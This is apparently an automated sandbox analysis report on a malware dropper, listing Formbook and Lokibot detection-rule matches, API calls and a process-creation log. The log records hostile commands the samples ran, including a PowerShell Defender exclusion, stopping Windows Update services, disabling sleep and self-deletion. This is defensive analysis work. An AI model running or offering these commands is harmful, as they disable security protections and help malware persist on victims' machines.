                    Source: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000000E.00000002.2490251590.0000000003E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: Process Memory Space: New_Text_Document.exe PID: 7076, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: Process Memory Space: sbinzx.exe PID: 6748, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: Process Memory Space: sbinzx.exe PID: 6356, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: Process Memory Space: pznhcda.exe PID: 2692, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: Process Memory Space: pznhcda.exe PID: 6160, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: Process Memory Space: colorcpl.exe PID: 1792, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: C:\Users\user\Desktop\a\kung.exe, type: DROPPEDMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: C:\Users\user\Desktop\a\kung.exe, type: DROPPEDMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: C:\Users\user\Desktop\a\kung.exe, type: DROPPEDMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: C:\Users\user\Desktop\a\kung.exe, type: DROPPEDMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\Users\user\Desktop\a\kung.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: String function: 012DEA12 appears 86 times
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: String function: 012A5130 appears 58 times
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: String function: 012EF290 appears 105 times
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: String function: 012B7E54 appears 111 times
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: String function: 0125B970 appears 277 times
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: String function: 01B77E54 appears 97 times
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: String function: 01B9EA12 appears 37 times
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040B0C3 NtDelayExecution,8_2_0040B0C3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00428143 NtClose,8_2_00428143
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040A1B3 NtResumeThread,8_2_0040A1B3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040AA23 NtCreateFile,8_2_0040AA23
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00409B83 NtSuspendThread,8_2_00409B83
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040AC53 NtReadFile,8_2_0040AC53
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040B4E3 NtAllocateVirtualMemory,8_2_0040B4E3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040A5D3 NtCreateSection,8_2_0040A5D3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00409D93 NtGetContextThread,8_2_00409D93
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040A7F3 NtMapViewOfSection,8_2_0040A7F3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00409FA3 NtSetContextThread,8_2_00409FA3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2B60 NtClose,LdrInitializeThunk,8_2_012A2B60
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_012A2DF0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_012A2C70
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A35C0 NtCreateMutant,LdrInitializeThunk,8_2_012A35C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A4340 NtSetContextThread,8_2_012A4340
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A4650 NtSuspendThread,8_2_012A4650
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2BA0 NtEnumerateValueKey,8_2_012A2BA0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2B80 NtQueryInformationFile,8_2_012A2B80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2BE0 NtQueryValueKey,8_2_012A2BE0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2BF0 NtAllocateVirtualMemory,8_2_012A2BF0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2AB0 NtWaitForSingleObject,8_2_012A2AB0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2AF0 NtWriteFile,8_2_012A2AF0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2AD0 NtReadFile,8_2_012A2AD0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2D30 NtUnmapViewOfSection,8_2_012A2D30
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2D00 NtSetInformationFile,8_2_012A2D00
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2D10 NtMapViewOfSection,8_2_012A2D10
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2DB0 NtEnumerateKey,8_2_012A2DB0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2DD0 NtDelayExecution,8_2_012A2DD0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2C00 NtQueryInformationProcess,8_2_012A2C00
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2C60 NtCreateKey,8_2_012A2C60
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2CA0 NtQueryInformationToken,8_2_012A2CA0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2CF0 NtOpenProcess,8_2_012A2CF0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2CC0 NtQueryVirtualMemory,8_2_012A2CC0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2F30 NtCreateSection,8_2_012A2F30
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2F60 NtCreateProcessEx,8_2_012A2F60
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2FA0 NtQuerySection,8_2_012A2FA0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2FB0 NtResumeThread,8_2_012A2FB0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2F90 NtProtectVirtualMemory,8_2_012A2F90
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2FE0 NtCreateFile,8_2_012A2FE0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2E30 NtWriteVirtualMemory,8_2_012A2E30
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2EA0 NtAdjustPrivilegesToken,8_2_012A2EA0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2E80 NtReadVirtualMemory,8_2_012A2E80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A2EE0 NtQueueApcThread,8_2_012A2EE0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A3010 NtOpenDirectoryObject,8_2_012A3010
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A3090 NtSetValueKey,8_2_012A3090
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A39B0 NtGetContextThread,8_2_012A39B0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A3D10 NtOpenProcessToken,8_2_012A3D10
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A3D70 NtOpenThread,8_2_012A3D70
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_0041A320 NtCreateFile,9_2_0041A320
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_0041A3D0 NtReadFile,9_2_0041A3D0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_0041A450 NtClose,9_2_0041A450
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_0041A500 NtAllocateVirtualMemory,9_2_0041A500
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_0041A31B NtCreateFile,9_2_0041A31B
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_0041A44A NtReadFile,NtClose,9_2_0041A44A
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_0041A4FB NtAllocateVirtualMemory,9_2_0041A4FB
                    Source: C:\Windows\explorer.exeCode function: 12_2_094B6232 NtCreateFile,12_2_094B6232
                    Source: C:\Windows\explorer.exeCode function: 12_2_0E481E12 NtProtectVirtualMemory,12_2_0E481E12
                    Source: C:\Windows\explorer.exeCode function: 12_2_0E480232 NtCreateFile,12_2_0E480232
                    Source: C:\Windows\explorer.exeCode function: 12_2_0E481E0A NtProtectVirtualMemory,12_2_0E481E0A
                    Source: foto1661.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 1392555 bytes, 2 files, at 0x2c +A "ex8QX0jl.exe" +A "6cB66Yp.exe", ID 1972, number 1, 46 datablocks, 0x1503 compression
                    Source: smss.exe.0.drStatic PE information: No import functions for PE file found
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZlIi.exeF vs New_Text_Document.exe
                    Source: New_Text_Document.exe, 00000000.00000000.1201539645.0000000000F94000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNew Text Document.exe4 vs New_Text_Document.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZlIi.exeF vs New_Text_Document.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLyoY.exeB vs New_Text_Document.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCgWC.exeF vs New_Text_Document.exe
                    Source: audiodgse.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: sbinzx.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: davincizx.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: setup.exe.0.drStatic PE information: Section: ZLIB complexity 1.0008028098344204
                    Source: setup.exe.0.drStatic PE information: Section: ZLIB complexity 1.001751313485114
                    Source: setup.exe.0.drStatic PE information: Section: ZLIB complexity 1.0210727969348659
                    Source: setup.exe.0.drStatic PE information: Section: ZLIB complexity 1.0852713178294573
                    Source: setup.exe.0.drStatic PE information: Section: ZLIB complexity 1.3333333333333333
                    Source: setup.exe.0.drStatic PE information: Section: ZLIB complexity 2.3333333333333335
                    Source: setup.exe.0.drStatic PE information: Section: ZLIB complexity 1.0132530120481928
                    Source: setup.exe.0.drStatic PE information: Section: ZLIB complexity 1.0677966101694916
                    Source: setup.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.5
                    Source: 201.exe.0.drStatic PE information: Section: ZLIB complexity 1.0002048732517483
                    Source: New_Text_Document.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile created: C:\Users\user\Desktop\aJump to behavior
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@79/31@31/25
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, QU7UqdtGwCSDkMjeM9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, CKXHsr7fVo6pg31t6V.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, CKXHsr7fVo6pg31t6V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, CKXHsr7fVo6pg31t6V.csSecurity API names: _0020.AddAccessRule
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, CKXHsr7fVo6pg31t6V.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, CKXHsr7fVo6pg31t6V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, CKXHsr7fVo6pg31t6V.csSecurity API names: _0020.AddAccessRule
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, QU7UqdtGwCSDkMjeM9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: C:\Users\user\Desktop\a\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exe
                    Source: New_Text_Document.exeReversingLabs: Detection: 50%
                    Source: New_Text_Document.exeVirustotal: Detection: 63%
                    Source: C:\Users\user\Desktop\New_Text_Document.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\New_Text_Document.exe C:\Users\user\Desktop\New_Text_Document.exe
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\audiodgse.exe "C:\Users\user\Desktop\a\audiodgse.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\sbinzx.exe "C:\Users\user\Desktop\a\sbinzx.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess created: C:\Users\user\Desktop\a\sbinzx.exe C:\Users\user\Desktop\a\sbinzx.exe
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess created: C:\Users\user\Desktop\a\audiodgse.exe C:\Users\user\Desktop\a\audiodgse.exe
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess created: C:\Users\user\Desktop\a\sbinzx.exe C:\Users\user\Desktop\a\sbinzx.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                    Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\autolog.exe "C:\Users\user\Desktop\a\autolog.exe"
                    Source: C:\Users\user\Desktop\a\autolog.exeProcess created: C:\Users\user\AppData\Local\Temp\pznhcda.exe "C:\Users\user~1\AppData\Local\Temp\pznhcda.exe"
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess created: C:\Users\user\AppData\Local\Temp\pznhcda.exe C:\Users\user~1\AppData\Local\Temp\pznhcda.exe
                    Source: C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exeProcess created: C:\Windows\SysWOW64\poqexec.exe C:\Windows\SysWOW64\poqexec.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\setup.exe "C:\Users\user\Desktop\a\setup.exe"
                    Source: C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
                    Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user~1\AppData\Local\Temp\pznhcda.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\a\sbinzx.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\audiodgse.exe "C:\Users\user\Desktop\a\audiodgse.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\sbinzx.exe "C:\Users\user\Desktop\a\sbinzx.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\autolog.exe "C:\Users\user\Desktop\a\autolog.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: C:\Users\user\Desktop\a\setup.exe "C:\Users\user\Desktop\a\setup.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeProcess created: C:\Users\user\Desktop\a\audiodgse.exe C:\Users\user\Desktop\a\audiodgse.exeJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess created: C:\Users\user\Desktop\a\sbinzx.exe C:\Users\user\Desktop\a\sbinzx.exeJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess created: C:\Users\user\Desktop\a\sbinzx.exe C:\Users\user\Desktop\a\sbinzx.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exeJump to behavior
                    Source: C:\Users\user\Desktop\a\autolog.exeProcess created: C:\Users\user\AppData\Local\Temp\pznhcda.exe "C:\Users\user~1\AppData\Local\Temp\pznhcda.exe"
                    Source: C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exeProcess created: C:\Windows\SysWOW64\poqexec.exe C:\Windows\SysWOW64\poqexec.exe
                    Source: C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeProcess created: C:\Users\user\AppData\Local\Temp\pznhcda.exe C:\Users\user~1\AppData\Local\Temp\pznhcda.exe
                    Source: C:\Users\user\Desktop\a\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    Source: C:\Users\user\Desktop\a\setup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                    Source: C:\Users\user\Desktop\a\setup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    Source: C:\Users\user\Desktop\a\setup.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                    Source: C:\Users\user\Desktop\a\setup.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\a\setup.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\raserver.exeProcess created: unknown unknown
